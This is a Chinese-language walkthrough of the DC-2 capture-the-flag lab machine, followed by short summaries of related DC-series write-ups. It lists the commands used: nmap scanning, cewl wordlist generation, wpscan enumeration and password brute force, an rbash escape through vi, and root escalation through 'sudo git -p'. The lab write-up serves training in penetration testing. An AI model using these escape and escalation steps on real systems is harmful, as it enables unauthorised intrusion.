【CTF】靶机:DC-2

简介: 本靶机适合初学者进行练习,适合已经了解渗透流程,有整体思路的初学者进行学习。 本文将从头讲解,并配有视频教程。

本次靶机教程很多细节不好展示
可以去本人bilibili给观看视频教程
本人bilibili主页地址:
https://space.bilibili.com/123895286

靶机下载地址
链接:https://pan.baidu.com/s/1eOdWynbx9crErzY4eeuW5Q
提取码:6b9g
--来自百度网盘超级会员V4的分享
安装与网络配置请看上一章

直接开始!

首先,我们要找到靶机ip,然后进行端口扫描

nmap扫描

然后我们访问靶机ip,发现网址跳转,网址为dc-2
显然,计算机无法进行解析
所以,我们需要修改/etc/hosts

hosts修改

我们打开IP,访问正常并得到flag1

flag1

flag1,cewl暗示我们需要进行用户账号密码的爆破处理,而cewl是一个网页关键字抓取工具(抓取网页上的关键字,作为密码字典)于是我们对密码进行生成
cewl http://dc-2 > pass.txt
即可获得pass.txt
-w = > //写入
-m n//至少生成长度为n,默认n=3
-d x // 生成更大的字典,默认x=2

cewl

由于网站程序的特殊性,我们使用专门利用wordpress的工具 wpscan
wpscan基本使用如下
wpscan –url http://dc-2 -e u
-e u //枚举用户信息
wpscan –url +
-P passwdspath
-U userspath
我们获得三个用户名
请输描述
下来,我们进行爆破
请输
于是我们得到了Tom与jerry的user和password

 | Username: jerry, Password: adipiscing
 | Username: tom, Password: parturient

我们分别进行尝试,发现jerry的账户可以进入
我们稍微寻找,得到了flag2
请输入图片描述

flag2说你不能利用wordpress程序,那么,我们不禁想到除了可以访问wordpress的80端口,还有ssh服务的7744端口
那么,我们使用ssh -p prot user@ip开始ssh连接
连接后,我们发现flag3.txt
当我们使用cat进行查看时,发现rbash
所以,我们需要查看我们可用命令
tom@DC-2:~$ ls /home/tom/usr/bin
less ls scp vi
于是我们决定利用vi进行rbash逃逸
可以进入vi中执行set命令将shell改为/bin/sh
命令如下:
vi
:set shell=/bin/sh //给shell赋值
:shell //执行shell
逃逸成功后发现命令还是无法执行
我们查看PATH变量
请输入图片描述
显然,这是路径的问题,我们需要修改路径
export PATH=PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/bin:sbin
然后就可以进行操作了
请输入图片描述
flag3提示我们使用su命令切换到jerry
那么我们进行切换
请输入图片描述
我们进入Jerry的家目录看到flag4
请输入图片描述
flag4提示我们使用git提权,拿下最终的flag
我们可以稍微了解下git
sudo -l //授权查看
Git //开源分布控制系统
原理是git存在缓冲区溢出漏洞,在使用sudo git -p时,不需要输入root密码即可以root权限执行这条命令。
操作如下:
sudo git -p
:!/bin/sh //shell转义,所以要避免sudo授权用户使用vi,vim,ftp.lee,more,git….
cd /root
请输入图片描述
拿到最终finl-flag!!

目录
相关文章
|
3月前
|
SQL 安全 Shell
vulnhub靶机实战_DC-3
本文介绍DC-3靶机渗透测试全过程,涵盖环境搭建、信息扫描、SQL注入、权限提升等环节。通过Joomla漏洞获取管理员密码,上传木马并提权至root,最终获取flag,是一套完整的渗透实战流程。
758 1
|
3月前
|
SQL Shell 网络安全
vulnhub靶机实战_DC-8
本文介绍DC-8靶机渗透全过程,涵盖环境搭建、信息扫描、SQL注入、密码爆破、反向Shell获取及提权。利用sqlmap与john工具破解用户凭据,通过Web表单执行命令并获取root权限,最终读取flag完成渗透测试。
369 0
|
3月前
|
关系型数据库 MySQL 网络安全
vulnhub靶机实战_DC-7
本文介绍DC-7靶机渗透测试全过程,包括靶机下载、VMware导入、网络配置、Nmap扫描发现开放80和22端口,通过信息搜集获取数据库凭证,尝试登录SSH成功,获得系统访问权限。适合网络安全学习者实践渗透流程。
164 0
|
3月前
|
中间件 测试技术 应用服务中间件
vulnhub靶机实战_DC-5
本教程介绍如何下载并配置DC-5靶机进行安全测试。内容包括靶机下载链接、VMware导入步骤、网络设置及Nmap扫描分析,帮助快速搭建渗透测试环境。
239 0
|
3月前
|
存储 安全 Shell
vulnhub靶机实战_DC-4
本文介绍了DC-4靶机渗透测试的完整过程,包括靶机下载、环境搭建、信息扫描、漏洞利用、提权以及最终获取flag的详细步骤。通过使用工具如nmap、Hydra进行端口扫描与密码爆破,结合反向Shell与teehee命令实现权限提升,最终成功获取系统flag。内容详实,适合网络安全学习与实践。
475 0
vulnhub靶机实战_DC-4
|
3月前
|
安全 网络安全 开发工具
vulnhub靶机实战_DC-2
本文介绍了DC-2靶机的渗透测试实战过程,涵盖靶机下载、环境搭建、信息扫描、漏洞利用、权限提升及最终提权获取flag的完整流程。内容包括使用nmap扫描、WPScan和Hydra工具爆破登录信息,绕过rbash限制,利用git提权等关键技术步骤。
180 0
|
3月前
|
安全 网络安全 数据库
vulnhub靶机实战_DC-1
本实验通过启动靶机、扫描漏洞、攻击Drupal服务、获取数据库权限、提权至root,最终成功获取所有flag,完成渗透测试目标。
272 0
vulnhub靶机实战_DC-1
|
安全 Linux 网络安全
Neos的渗透测试靶机练习——DC-3
Neos的渗透测试靶机练习——DC-3
186 4
|
安全 Shell 网络安全
Neos的渗透测试靶机练习——DC-1
Neos的渗透测试靶机练习——DC-1
255 4
|
安全 Shell 网络安全
DC-2靶机上了解和练习WordPress框架
本文介绍了在一个名为DC2的虚拟环境中进行渗透测试的过程。首先通过扫描发现SSH和Web端口,并进行全端口扫描以寻找隐藏端口。接着通过信息收集、漏洞利用(如SQL注入、文件上传漏洞等)、反弹Shell及提权等步骤逐步攻陷目标系统。文章详细描述了使用Cewl生成字典、Dirsearch扫描目录、Wpscan枚举WordPress用户等技巧,并最终通过SSH登录和Git命令实现了提权,获取多个flag。
261 3